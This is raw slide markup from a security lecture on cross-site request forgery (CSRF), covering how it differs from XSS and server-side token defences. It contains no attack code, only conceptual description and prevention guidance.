              <a:t>The attacker adds himself as a payee to the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0"/>
              <a:t>account, transfers money</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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5659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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1780456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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing CSRF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-side Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="309712" y="2140496"/>
            <a:ext cx="12313368" cy="6048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>
              <a:buSzPct val="155000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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Allow GET request to only retrieve data and not modify data on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Require all POSTs requests to contain a pseudo-random value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Trusted site generates pseudo-random value R, and sets it as a cookie on user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Every form submission (POST) to include R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Request valid only if form value == cookie value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buSzPct val="155000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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック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2470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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1780456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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing CSRF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-side Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="453728" y="5308848"/>
            <a:ext cx="12097344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914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Assume that the attacker cannot modify cookie values or read data sent from server to user (same origin policy), i.e., does not know R. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Hence, cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>forge appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>requests through his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>We assume R is hash value of session credentials and some random data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="token-pos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60" y="1852464"/>
            <a:ext cx="11521280" cy="30979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14168" y="9125272"/>
            <a:ext cx="8136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Sources:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Zeller&amp;Felten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> paper and  https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.whitehatsec.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/resource/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>stats.html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042851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70040A-2FDC-3940-B553-C8C72E801627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-12700" y="0"/>
            <a:ext cx="13004800" cy="18923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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Today</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s Lecture</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site Request Forgery (CSRF) Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="2428875"/>
            <a:ext cx="11161713" cy="633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marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>What is a Cross-site Request Forgery (CSRF) attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How they differ from XSS attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Examples and potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>for damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Measures that do not work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Methods to prevent/protect against such attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Server-side to prevent CSRF attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Client-side to protect against CSRF attacks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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13042900" cy="939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6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS vs. CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381720" y="1564432"/>
            <a:ext cx="12313368" cy="7560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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>CSRF (Cross-site request forgery)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>a malicious website causes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>browser to perform unwanted actions on a trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Leverages implicit authentication in user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buSzPct val="155000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endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>XSS (Cross-site scripting)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>website leverages bugs in trusted website to cause unwanted action on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>s browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>(circumventing the same-origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
